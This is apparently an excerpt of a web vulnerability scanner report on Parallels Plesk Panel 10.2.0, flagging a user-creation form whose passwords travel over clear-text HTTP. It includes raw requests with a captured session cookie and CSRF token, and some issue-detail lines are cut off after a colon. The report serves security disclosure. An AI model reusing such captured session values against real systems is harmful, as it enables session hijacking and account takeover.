<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
<option value="TW" label="Taiwan">Taiwan</option>
<option value="TJ" label="Tajikistan">Tajikistan</option>
<option value="TZ" label="Tanzania, United Republic of">Tanzania, United Republic of</option>
<option value="TH" label="Thailand">Thailand</option>
<option value="TL" label="Timor-Leste">Timor-Leste</option>
<option value="TG" label="Togo">Togo</option>
<option value="TK" label="Tokelau">Tokelau</option>
<option value="TO" label="Tonga">Tonga</option>
<option value="TT" label="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="TN" label="Tunisia">Tunisia</option>
<option value="TR" label="Turkey">Turkey</option>
<option value="TM" label="Turkmenistan">Turkmenistan</option>
<option value="TC" label="Turks and Caicos Islands">Turks and Caicos Islands</option>
<option value="TV" label="Tuvalu">Tuvalu</option>
<option value="UG" label="Uganda">Uganda</option>
<option value="UA" label="Ukraine">Ukraine</option>
<option value="AE" label="United Arab Emirates">United Arab Emirates</option>
<option value="GB" label="United Kingdom">United Kingdom</option>
<option value="US" label="United States" selected="selected">United States</option>
<option value="UM" label="United States Minor Outlying Islands">United States Minor Outlying Islands</option>
<option value="UY" label="Uruguay">Uruguay</option>
<option value="UZ" label="Uzbekistan">Uzbekistan</option>
<option value="VU" label="Vanuatu">Vanuatu</option>
<option value="VE" label="Venezuela, Bolivarian Republic of">Venezuela, Bolivarian Republic of</option>
<option value="VN" label="Viet Nam">Viet Nam</option>
<option value="VG" label="Virgin Islands, British">Virgin Islands, British</option>
<option value="VI" label="Virgin Islands, U.S.">Virgin Islands, U.S.</option>
<option value="WF" label="Wallis and Futuna">Wallis and Futuna</option>
<option value="EH" label="Western Sahara">Western Sahara</option>
<option value="YE" label="Yemen">Yemen</option>
<option value="ZM" label="Zambia">Zambia</option>
<option value="ZW" label="Zimbabwe">Zimbabwe</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'contacts-contactsSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:36 GMT
Connection: close
Content-Length: 23628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create User Account - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fcreate' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create User Account</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'></span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/user/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:02 GMT
Connection: close
Content-Length: 23631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create User Account - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
